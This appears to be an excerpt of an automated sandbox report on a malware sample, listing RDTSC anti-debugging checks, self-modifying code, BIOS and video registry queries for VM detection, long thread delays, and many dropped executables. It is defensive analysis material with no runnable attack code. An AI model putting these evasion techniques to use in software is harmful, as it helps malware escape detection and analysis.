Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50103B5 second address: 50103CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCC24F8725Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50103CB second address: 50103F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D2113Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCC24D21145h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50103F2 second address: 50103F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FCEDC0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FCEE81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1177E94 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 12119AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 85EDC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 85EE81 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A07E94 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: AA19AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: EEC60 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: EECFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 2BAFA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 2A5889 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05030732 rdtsc

0_2_05030732

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Window / User API: threadDelayed 538	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2640	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3316	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2764
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 681
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3051
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 450
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7377
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 569
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7084
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2893
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5466
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2535
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2903
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5273
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3455
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6647
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 546
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1499
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4076

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1033551001\9a8f788f0d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\rsn[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1033224001\mQvinTe.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Dd7mHw1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mQvinTe[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1032622001\Dd7mHw1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1032619001\rsn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1032884001\D95Ju8g.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1033552001\e14357a0aa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\D95Ju8g[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7812	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7812	Thread sleep time: -138069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7800	Thread sleep count: 198 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7800	Thread sleep time: -396198s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772	Thread sleep count: 131 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772	Thread sleep time: -3930000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7808	Thread sleep count: 182 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7808	Thread sleep time: -364182s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796	Thread sleep count: 197 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796	Thread sleep time: -394197s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7784	Thread sleep count: 171 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7784	Thread sleep time: -342171s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7788	Thread sleep count: 177 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7788	Thread sleep time: -354177s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe TID: 8092	Thread sleep count: 538 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3804	Thread sleep count: 2640 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3804	Thread sleep count: 3316 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep count: 2764 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 681 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep count: 3022 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep count: 512 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2424	Thread sleep count: 3051 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672	Thread sleep count: 274 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5448	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768	Thread sleep count: 6912 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264	Thread sleep count: 450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5596	Thread sleep count: 7084 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep count: 2000 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe TID: 4888	Thread sleep count: 299 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1740	Thread sleep count: 2893 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3336	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep count: 2027 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6288	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732	Thread sleep count: 5466 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592	Thread sleep count: 915 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep count: 2535 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692	Thread sleep count: 2903 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep count: 89 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284	Thread sleep count: 5273 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496	Thread sleep count: 1002 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe TID: 8184	Thread sleep count: 312 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep count: 3455 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4116	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 332	Thread sleep count: 1896 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5344	Thread sleep count: 6647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976	Thread sleep count: 546 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5868	Thread sleep count: 2111 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep count: 1499 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1376	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548	Thread sleep count: 4076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6632	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
